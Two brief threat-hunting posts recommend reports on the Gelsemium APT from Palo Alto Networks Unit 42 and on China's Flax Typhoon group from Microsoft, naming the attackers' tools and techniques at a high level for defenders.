I hope everyone is having a good weekend!

The Palo Alto Networks Unit 42 research team discovered some activity that they attributed to a very stealthy and rarely seen APT, #Gelsemium. They target a diverse group of industries but use tools like #CobaltStrike, #MetaSploit, and #ChinaChopper but also used the Potato Suite that was seen as JuicyPotato.exe (who can't appreciate that?!). This was a great weekend read and I hope you all enjoy it as much as I did! Happy Hunting!

Rare Backdoors Suspected to be Tied to Gelsemium APT Found in Targeted Attack in Southeast Asian Government
https://unit42.paloaltonetworks.com/rare-possible-gelsemium-attack-targets-se-asia/

#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

Good day everyone! The Microsoft Threat Intelligence team has discovered activity from a group known as #FlaxTyphoon. They are a nation-state group from China that targeted organizations in Taiwan. While the group leverages tools that are commonly used, like #ChinaChopper, #MetaSploit, and #Mimikatz, they also rely on abusing #LOLBINS, or Living-off-the-land binaries and scripts (tools that exist and come with the native operating system). Some of their TTPs include using registry key modification for persistence, using #powershell, #certutil, or #bitsadmin to download tools, and accessing #LSASS process memory and Security Account Manager registry hive for credential access. This is a great article that not only provides high-level details but it provides a starting point for any organization to start threat hunting by using the technical details provided! Enjoy your weekend and #HappyHunting!

#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #readoftheday